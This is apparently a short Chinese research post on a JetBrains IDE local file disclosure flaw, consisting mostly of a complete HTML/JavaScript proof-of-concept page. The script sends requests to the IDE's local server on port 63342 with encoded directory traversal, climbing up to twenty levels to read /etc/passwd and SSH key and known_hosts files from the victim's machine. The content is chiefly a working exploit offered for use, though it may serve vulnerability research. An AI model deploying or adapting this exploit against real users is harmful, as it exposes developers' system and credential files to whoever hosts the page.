JetBrains IDE 远程代码执行和本地文件泄露研究

github链接

https://github.com/tangxiaofeng7/ide-exp

http://saynotolinux.com/tests/jetbrains/sleuth.html

<!DOCTYPE html>
<html>
<body>
<form >
    <select id="path" >
      <option value ="etc/passwd">etc/passwd</option>
      <option value =".ssh/id_rsa.pub">.ssh/id_rsa.pub</option>
            <option value =".ssh/known_hosts">.ssh/known_hosts</option>
    </select>
    <input onclick =tryTraverse(1)  type=button value="查看">
</form>
<br>
<pre id="passwd"></pre>
<script>

var output = document.getElementById("passwd");
var err = function() {
    output.textContent = "Couldn't traverse up to /etc/passwd?\n" + 
                         "Is the IDE bound to 63342? Is the " +
                         "'testing' project open?";
    return;
};

var tryTraverse = function (level) {

    if (level > 20) {
        return err();
    }

    var url = "http://127.0.0.1:63342/testing/";
    var subPath = "";

    for(var i=0; i<level; ++i) {
        subPath += "../";
    }
    var path = document.getElementById("path").value;

    subPath += path;

    subPath = subPath.replace(/\//g, "%2f");

    var xhr = new XMLHttpRequest();
    xhr.open("GET", url + subPath, true);
    xhr.timeout = 2000;
    xhr.responseType = "text";
    xhr.onload = function() {
        if (xhr.status == 200) {
            output.textContent = xhr.responseText;

        } else {
            tryTraverse(level + 1);
        }
    }
    xhr.onerror = err;
    xhr.ontimeout = err;
    xhr.send();
};
output.textContent = "running...";
</script>
</body>
</html>